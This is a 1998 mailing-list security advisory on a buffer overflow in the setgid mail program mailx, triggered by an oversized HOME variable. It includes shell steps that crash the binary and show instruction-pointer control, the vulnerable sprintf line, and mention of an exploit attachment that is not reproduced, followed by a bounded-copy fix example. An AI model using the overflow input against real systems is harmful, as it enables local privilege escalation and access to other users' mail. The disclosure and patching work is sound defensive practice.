security hole in mailx
Date: Thu, 25 Jun 1998 06:19:29 +0200
From: Alvaro Martinez Echevarria <alvaro@LANDER.ES>
To: BUGTRAQ@NETSPACE.ORG
Subject: security hole in mailx
Hi there.
I've discovered a rather serious security hole in mailx, the good
old Berkeley mail program. It's somehow present at least in the
last versions I've checked (mailx-8.1.1 in Linux, mailx 5.0 in
Solaris). The bug is an exploitable buffer overflow (using the
HOME environment variable) that allows any local user to acquire
the privileges under which the program runs, usually group "mail"
(on many of the modern versions I've seen, mailx is setgid
"mail"). So the bug allows you to get "mail" group privileges,
and this means that at least you can play with other people's
mail. Although this wouldn't be very nice of you, this
shouldn't be a big problem for the integrity of the system. But
there could be a much more serious implication: being able to
write in /var/spool/mail is usually an open door to the root
account, for example by using races and such in mail delivery
programs.
You can check if your particular version of mailx is vulnerable
through these steps:
$ cp `which mailx` ./mailx
$ HOME=`perl -e 'print "A"x10000'` ./mailx
Segmentation fault (core dumped)
$ gdb ./mailx core
GNU gdb 4.17
[...]
#0 0x41414141 in ?? ()
Here we go. By the way, although in Linux 2000 "A"s are enough,
in Solaris you'll need more (10000 worked for me). I've verified
that Debian GNU/Linux (package mailx-8.1.1-9 and previous) is
vulnerable. Solaris 5.5.1 and 5.6 (mailx 5.0) also seem vulnerable
after a couple of quick tests, but I haven't been able to
check the return address due to lack of root access to any
Solaris, so I'm not 100% sure. Redhat Linux mailx has the bug,
but as they don't install it setgid mail there's no direct
danger.
About the bug: it is in "fio.c", in the "xname" variable of the
"expand" function:
char xname[PATHSIZE];
[...]
sprintf(xname, "%s%s", homedir, name + 1);
Two attachments are included in this message:
- A patch against mailx-8.1.1 that solves the problem. There
  are a lot of buffer overflows in the sources of mailx,
  although only the one I mention seems to be exploitable. The
  patch is dirty and simple: replace sprintf and strcpy by
  snprintf and strncpy almost everywhere. I haven't tested it
  a lot, use it at your own risk.
- An exploit that should work under Linux (at least it does so in
  Debian). To test: compile it, execute it, and it should give you
  a shell; check with "id" if you are group "mail". By the way,
  the program assumes the gid for group mail is 8, as in Debian.
  Please, use it _JUST_ for testing and educative purposes ;)
I reported the problem a few days ago to Debian, Redhat, Sun, and
CERT, and I also sent them the patches. So the new versions
should be on the way or even already released, at least for the
Linux distributions.
BTW, the person who tested the bug under Solaris (I don't have
direct access to any Solaris machine) told me that he had a hard
time:
tcsh$ setenv HOME `perl -e 'print "A"x10000'`
connection lost
!!! Seems like tcsh doesn't like huge homes like this. Second try:
tcsh$ exec sh
sh$ HOME=`perl -e 'print "A"x10000'`
sh$ which mailx
Segmentation Fault (core dumped)
Erm... Seems like Sun is doing a great job with buffer overflows.
This happened under 5.5.1. I wonder if these have any security
implication. Anyway, they are not bad as a joke.
Regards.
--
Alvaro Martínez Echevarría
LANDER SISTEMAS
Pº Castellana, 121
28046 Madrid, SPAIN
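
Added example, not part of the original message or of the mailx sources: a bounded version of the "~" expansion quoted from fio.c above. It shows why a plain sprintf-to-snprintf swap also needs a check of the return value, since a silently truncated path names a different file. The names expand_home and EX_PATHSIZE (set to 1024) are assumptions made for this example.

```c
#include <stdio.h>
#include <string.h>

#define EX_PATHSIZE 1024   /* assumed stand-in for mailx's PATHSIZE */

/*
 * Pattern from the post (unbounded; overflows xname when HOME is long):
 *     char xname[PATHSIZE];
 *     sprintf(xname, "%s%s", homedir, name + 1);
 *
 * Bounded variant (hypothetical helper): name must start with '~'.
 * Returns 0 on success, -1 if the arguments are invalid or the
 * result would not fit (out is then set to the empty string).
 */
int expand_home(char *out, size_t outsz, const char *homedir, const char *name)
{
    int n;

    if (out == NULL || outsz == 0)
        return -1;
    out[0] = '\0';
    if (homedir == NULL || name == NULL || name[0] != '~')
        return -1;

    n = snprintf(out, outsz, "%s%s", homedir, name + 1);
    /* snprintf returns the length it wanted to write; a value
     * >= outsz means truncation, which is treated as an error
     * instead of handing back a shortened path. */
    if (n < 0 || (size_t)n >= outsz) {
        out[0] = '\0';
        return -1;
    }
    return 0;
}

int main(void)
{
    char xname[EX_PATHSIZE];
    char longhome[2001];               /* constructed input: 2000 'A's */

    memset(longhome, 'A', sizeof longhome - 1);
    longhome[sizeof longhome - 1] = '\0';

    printf("normal:   %d\n", expand_home(xname, sizeof xname, "/home/user", "~/mbox"));
    printf("longhome: %d\n", expand_home(xname, sizeof xname, longhome, "~/mbox"));
    return 0;
}
```

A caller should treat -1 as a hard failure and refuse to open anything, which matters most in a binary installed setgid.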